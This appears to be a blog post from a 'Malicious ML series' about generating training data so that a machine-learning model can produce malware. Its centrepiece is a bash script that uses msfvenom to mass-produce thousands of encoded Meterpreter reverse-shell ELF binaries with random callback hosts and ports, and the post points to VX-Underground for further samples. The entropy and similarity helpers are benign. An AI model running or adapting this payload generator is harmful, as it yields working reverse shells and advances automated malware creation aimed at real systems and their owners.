Purpose

If we want to train an ML algorithm to produce something malicious (say, a C2 beacon or a ransomware binary), we need good training data.

Approach

Use msfvenom to generate thousands of labeled samples (10,000 with the settings in the Code section) that we can then feed into an ML algorithm.

Drawbacks

Because a model that emits raw bytes bypasses the compile and link steps, the best it can do is generate working binaries for a single architecture. Even if it produces a valid binary, it's not going to produce magical AV/EDR-evading binaries that run on multiple platforms and support customizable C2 domains. However, it's still a fun experiment.

Alternatives to generation

There are lots of malicious binary examples out there.

VX-Underground

Download binaries directly from VX-Underground or a standard academic dataset. This introduces a lot of variety in PE/ELF formats.
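
With a mixed download, a first step is usually to sort samples by container format. The following is a minimal sketch that looks only at the leading magic bytes. `sample_format` is a hypothetical helper name, and the `pe` branch checks just the DOS `MZ` stub rather than validating the full PE header.

```shell
#!/bin/bash
# Classify a file by its leading magic bytes.
# sample_format is a hypothetical helper, not part of any dataset's tooling.
sample_format() {
    local magic
    # Read the first four bytes and render them as a lowercase hex string.
    magic=$(head -c 4 "$1" | od -An -v -tx1 | tr -d ' \n')
    case "$magic" in
        7f454c46) echo elf ;;      # 0x7f 'E' 'L' 'F'
        4d5a*)    echo pe ;;       # 'M' 'Z' DOS stub; the PE signature itself is not checked
        *)        echo unknown ;;
    esac
}
```

Calling `sample_format path/to/sample` prints `elf`, `pe`, or `unknown`, which is enough to split a download into per-format directories before any further processing.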

Code

Prerequisites: msfvenom and uuidgen are installed.

#!/bin/bash
# Generate labelled Meterpreter ELF samples with msfvenom.

numFiles=10000
mkdir -p out   # make sure the output directory exists

# Candidate values. Payloads listed more than once are drawn proportionally more often.
LPORTCHOICES=(80 443 1025 8080 8888 4444 1234 12345 5555 3333 4433 8443 9999 10000)
PAYLOADTYPES=("linux/x86/meterpreter/reverse_tcp" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter/reverse_tcp_uuid" "linux/x86/meterpreter_reverse_https" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter_reverse_http" "linux/x86/meterpreter_reverse_https")
ENCODERS=("x86/shikata_ga_nai" "x86/xor_dynamic" "generic/none")

overall_start_time=$(date +%s)
echo "Generating files.."
for i in $(seq 1 "$numFiles"); do

    # Pick a random host octet (1-100), port, payload, and encoder
    LHOSTO=$((1 + RANDOM % 100))
    LPORTR=${LPORTCHOICES[RANDOM % ${#LPORTCHOICES[@]}]}
    PAYLOAD=${PAYLOADTYPES[RANDOM % ${#PAYLOADTYPES[@]}]}
    ENCODERR=${ENCODERS[RANDOM % ${#ENCODERS[@]}]}
    FILENAME=$(uuidgen).elf

    # Generate based on payload type
    start_time=$(date +%s)
    msfvenom -p "$PAYLOAD" LHOST="192.168.0.$LHOSTO" LPORT="$LPORTR" -e "$ENCODERR" -f elf -o "out/$FILENAME" 2> /dev/null
    end_time=$(date +%s)

    duration=$((end_time - start_time))
    # echo "Generated $FILENAME : $PAYLOAD : 192.168.0.$LHOSTO : $LPORTR in $duration seconds"

    # Record a label only if a non-empty file was actually written
    if [ -s "out/$FILENAME" ]; then
        echo -e "$FILENAME\t$PAYLOAD\t192.168.0.$LHOSTO\t$LPORTR\t$ENCODERR" >> labels.tsv
    fi

    # Progress bar: 50 characters wide, so scale the fill to 50 rather than 100
    percent=$((i * 100 / numFiles))
    filled=$((i * 50 / numFiles))
    bar=$(printf '%*s' "$filled" '' | tr ' ' '#')
    printf "\rProgress: [%-50s] %d%%" "$bar" "$percent"

done
echo   # end the progress-bar line
overall_end_time=$(date +%s)
duration=$((overall_end_time - overall_start_time))
echo "Done in $duration seconds."

Explanation

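The script generates a batch of Meterpreter payloads for use in ML algorithms. Each sample gets a randomly chosen payload type, LHOST, LPORT, and encoder, and those choices are recorded as a row in labels.tsv.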
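
Because every parameter is drawn at random, it can be worth checking how evenly the labels came out before training on them. The following is a minimal sketch, assuming labels.tsv has the five tab-separated columns the script writes (filename, payload, LHOST, LPORT, encoder). `label_counts` is a hypothetical helper name.

```shell
#!/bin/bash
# Count how often each value appears in one column of a tab-separated label file.
# label_counts is a hypothetical helper. Column numbers follow the script's label row:
# 1=filename 2=payload 3=LHOST 4=LPORT 5=encoder.
label_counts() {
    local file=$1 column=$2
    # Extract the column, group identical values, and list the most frequent first.
    cut -f "$column" "$file" | sort | uniq -c | sort -rn
}
```

For example, `label_counts labels.tsv 2` lists the payload types by frequency and `label_counts labels.tsv 5` does the same for encoders.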

The generated files differ mainly in the encoded (or encrypted) payload bytes, which are high-entropy. With so little learnable structure separating one sample from another, it's doubtful any ML algorithm can learn enough to generate working binaries, much less working malware.
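
The high-entropy claim can be checked per file. The following is a minimal sketch that computes Shannon entropy over byte values, in bits per byte (0 for a constant file, 8 for uniformly random bytes). `byte_entropy` is a hypothetical helper name, and measuring the whole file rather than just the payload region is a simplifying assumption.

```shell
#!/bin/bash
# Shannon entropy of a file's bytes, in bits per byte.
# byte_entropy is a hypothetical helper; it measures the whole file, headers included.
byte_entropy() {
    # od prints every byte as an unsigned decimal; awk counts occurrences per value.
    od -An -v -tu1 "$1" | awk '
        { for (i = 1; i <= NF; i++) { count[$i]++; total++ } }
        END {
            if (total == 0) { print "0.0000"; exit }
            h = 0
            for (b in count) {
                p = count[b] / total
                h -= p * log(p) / log(2)   # log base 2 via natural logs
            }
            printf "%.4f\n", h
        }'
}
```

A loop such as `for f in out/*.elf; do printf '%s\t%s\n' "$f" "$(byte_entropy "$f")"; done` would give one entropy value per generated sample.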

Entropy Analysis

Similarity of generated ELF binaries

We ran a simple cosine similarity comparison across the generated binaries. As the animation shows, the differences between binaries are distributed fairly randomly; however, note that the scale of those differences is not extreme.
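
The exact feature representation behind the comparison is not stated here. As one possible sketch, the function below assumes each binary is reduced to a 256-bin byte-frequency histogram and computes the cosine similarity between two such histograms. `byte_cosine` is a hypothetical helper name, and a histogram ignores byte positions, so it may score files as more similar than a position-aware comparison would.

```shell
#!/bin/bash
# Cosine similarity between the byte-frequency histograms of two files.
# ASSUMPTION: byte histograms as features; the original comparison may have used others.
byte_cosine() {
    {
        # Prefix each od line with a tag so awk can tell the two files apart.
        od -An -v -tu1 "$1" | sed 's/^/1 /'
        od -An -v -tu1 "$2" | sed 's/^/2 /'
    } | awk '
        { for (i = 2; i <= NF; i++) hist[$1, $i]++ }
        END {
            for (b = 0; b < 256; b++) {
                x = hist[1, b] + 0; y = hist[2, b] + 0
                dot += x * y; na += x * x; nb += y * y
            }
            # An empty file has a zero vector, so the similarity is undefined.
            if (na == 0 || nb == 0) { print "nan"; exit }
            printf "%.4f\n", dot / sqrt(na * nb)
        }'
}
```

`byte_cosine out/a.elf out/b.elf` prints a value between 0 and 1, where 1 means the two files have identical byte distributions.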

Still, it's a fun experiment.

Malicious ML series - generate ELF training data
